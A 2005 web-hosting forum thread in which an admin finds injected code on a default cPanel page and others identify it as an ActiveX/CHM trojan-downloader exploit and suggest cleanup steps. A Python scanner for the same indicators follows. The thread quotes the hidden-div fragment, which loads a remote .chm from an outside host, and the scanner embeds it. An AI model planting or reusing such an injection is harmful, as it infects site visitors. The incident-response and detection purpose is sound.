The Community Forums


Help Required!!

Discussion in 'General Discussion' started by surebrowse, Dec 14, 2005.

  1. surebrowse

    surebrowse Member

    Joined:
    Dec 26, 2003
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    India
    Hello,

    I noticed that on our default cpanel page & some clients home page, Norton Antivirus noticed an exploit trying to execute something. The following code is at the bottom of the default cpanel page:

    <div style="POSITION:absolute;VISIBILITY:hidden">
    file://C:\\nosuch.mht!http://kasp.cc/x.chm::/
    x.htm" type="text/x-scriptlet"></object>');}catch(e){}</script></div>

    Not sure what it is or how it got there, but doesn't look good - we want to remove that.
    I don't know how to edit the default cpanel page.
     
  2. NT

    NT Well-Known Member

    Joined:
    May 4, 2004
    Messages:
    137
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    England, UK
    Hi,

    If memory serves me correctly, the default page is in /usr/local/apache/htdocs.

    Thanks,
    Nick.
     
  3. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    There could be two things:

    1) Your server is rooted / someone rogue had root access if the main default cpanel page was changed.

    I would check the actual raw file, /usr/local/apache/htdocs/index.html (or index.php / index.htm). Check for that code; if it's not there, it's probably #2.

    2) Spyware is rewriting IE pages on the fly and reinfecting the person. That code is an ActiveX exploit; I recognize the .mht(ml) extension, and using .chm to run a program / trojan downloader from back in the day.

    Check that file; if it's infected, I would get Rkhunter, make some cPanel backups, and go on from there.
     
  4. surebrowse

    surebrowse Member

    Joined:
    Dec 26, 2003
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    India
    Hi All,

    Thanks.

    I saw the actual raw file as suggested by HostMerit & deleted the code from the page.

    Let me check for a few hours; I will update here again.

    Again, thank you for the help.
     
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Please email me at kris@hostmerit.com or let me know your AIM screen name - I can help you check if you've been compromised. Since it's actually in the page, it means someone has had control of the server. I would be very wary and spend the next few hours backing up data, as your server is almost surely compromised.
     
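A small scanner for the injection pattern HostMerit tells surebrowse to look for in the raw files under the Apache document root: a hidden-positioned div, a file://...mht!...chm::/ chain, and a text/x-scriptlet object. This is an added example, not code from the thread or from cPanel; the indicator labels, function names and the document-root path are assumptions, and the sample page embeds only the fragment quoted in the first post.

```python
import re
from pathlib import Path

# Indicators of the hidden-div injection quoted in the thread.
# Labels are ours; patterns are case-insensitive because the injected
# markup mixes upper and lower case (POSITION, VISIBILITY).
INDICATORS = {
    "hidden_div": re.compile(r"<div[^>]*visibility\s*:\s*hidden", re.I),
    "mht_chm_chain": re.compile(r"file://[^\"'\s]*\.mht![^\"'\s]*\.chm::/", re.I),
    "scriptlet_object": re.compile(r'type\s*=\s*["\']text/x-scriptlet["\']', re.I),
}


def scan_html(text):
    """Return a list of (line_number, indicator) hits for one HTML document."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((lineno, label))
    return hits


def scan_docroot(root, suffixes=(".html", ".htm", ".php")):
    """Walk a document root (e.g. /usr/local/apache/htdocs, as named in the
    thread) and map each file that contains an indicator to its hits."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_html(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample page: the three middle lines are the fragment surebrowse
# quoted; the surrounding markup is ours. Raw string keeps the backslashes as shown.
SAMPLE_PAGE = r"""<html><body>
<h1>Default page</h1>
<div style="POSITION:absolute;VISIBILITY:hidden">
file://C:\\nosuch.mht!http://kasp.cc/x.chm::/
x.htm" type="text/x-scriptlet"></object>');}catch(e){}</script></div>
</body></html>"""

if __name__ == "__main__":
    for lineno, label in scan_html(SAMPLE_PAGE):
        print(f"line {lineno}: {label}")
```

Run scan_docroot("/usr/local/apache/htdocs") on the server itself to find every page carrying the same fragment, not just the default one.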